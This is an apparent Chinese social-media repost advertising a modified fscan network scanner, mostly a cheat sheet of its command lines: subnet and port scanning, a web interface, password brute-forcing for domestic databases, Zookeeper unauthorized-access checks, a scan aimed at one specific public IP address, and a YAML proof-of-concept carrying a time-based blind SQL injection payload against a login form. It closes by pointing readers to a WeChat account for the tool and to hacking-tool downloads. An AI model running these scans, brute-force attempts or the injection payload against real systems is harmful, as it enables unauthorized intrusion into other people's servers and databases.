由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
./xiaomi --web --web-port 8787 --web-load .res.txt./xiaomi --web --web-port 8787 -h 127.0.0.1 #可使用hf,其他参数直接加在后面即可 ./xiaomi -h 192.168.1.0/24 -prand./xiaomi -h 192.168.1.1 -p 22,80,443,3306 -prand国产数据库密码爆破:达梦zookeeper未授权检测
3307 → MySQL14333 → MSSQL2222 → SSH6378 → Redis
./xiaomi -h 112.5.57.79 -encrypt./xiaomi -dd .res.txtname: poc-login-sqlrules:- method: POSTpath: /web/loginheaders:Content-Type: application/x-www-form-urlencodedfollow_redirects: truebody: "user_name=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))x) AND '1'='1&language=0"expression: response.delay(5) && response.status == 200
获取
关注微信公众号:鹏组安全回复fscan魔改-大保健获取
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……




还没有评论,来说两句吧...